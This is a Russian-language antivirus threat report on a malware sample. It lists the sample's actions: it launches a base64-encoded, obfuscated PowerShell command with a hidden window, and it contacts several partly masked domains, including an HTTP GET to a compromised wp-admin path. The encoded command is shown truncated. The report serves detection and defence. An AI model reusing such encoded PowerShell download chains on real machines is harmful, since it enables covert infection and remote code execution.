Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAagBwADcAegBmAD0AKAAnAEkANQAnACsAJwBzAG8AJwArACcAcwBoAGQAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAFYAOgB0AEUATQBQAFwAbwBGAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
Сетевая активность
Подключается к
- 'ma#########rsvideochatwithourkids.com':80
- 'pl#####oolmatritva.com':80
- 'or###wise.us':80
- 'he####payless.com':80
- 'mg##e.com':80
- 'po###yter.com':80
TCP
Запросы HTTP GET
- http://sa###bby.com/wp-admin/LJin/
UDP
- DNS ASK sa###bby.com
- DNS ASK ma#########rsvideochatwithourkids.com
- DNS ASK pl#####oolmatritva.com
- DNS ASK or###wise.us
- DNS ASK he####payless.com
- DNS ASK mg##e.com
- DNS ASK po###yter.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAagBwADcAegBmAD0AKAAnAEkANQAnACsAJwBzAG8AJwArACcAcwBoAGQAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAFYAOgB0AEUATQBQAFwAbwBGAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)
